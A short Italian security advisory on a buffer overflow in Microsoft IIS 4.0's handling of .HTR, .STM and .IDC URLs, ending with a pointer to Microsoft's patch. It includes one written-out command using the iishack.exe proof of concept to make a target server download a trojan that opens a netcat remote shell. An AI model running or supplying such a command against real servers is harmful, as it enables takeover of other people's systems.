La causa di questo exploit che rientra nella categoria dei buffer overflow è
da ricercare nella verifica parziale delle dimensioni dei nomi che Microsoft IIS
4.0 effettua sulle URL di file con estensione .HTR, .STM e .IDC .
Questo può
consentire all'aggressore persino l'installazione di backdoors da remoto nonchè
l'esecuzione di comandi sul server nel contesto dei privilegi dell'utente
amministratore.
È stato sviluppato un eseguibile come proof-concept di
questa anomalia chiamato iishack.exe (http://www.securityfocus.com/).
Attraverso questo programma
diventa possibile, ad esempio, scaricare sul server un cavallo di troia
autoscompattante che, una volta eseguito, installa un listener netcat in grado
di restituire all'aggressore una shell di comandi remota:
c:> iishack www.target.com 80 www.mioserver.com/cavallo_di_troia.exe
Rimedi:
Applicare la patch rilasciata da Microsoft disponibile all'indirizzo ftp://ftp.microsoft.com/bussys/IIS/iis-public/fixes/usa/ext-fix/.
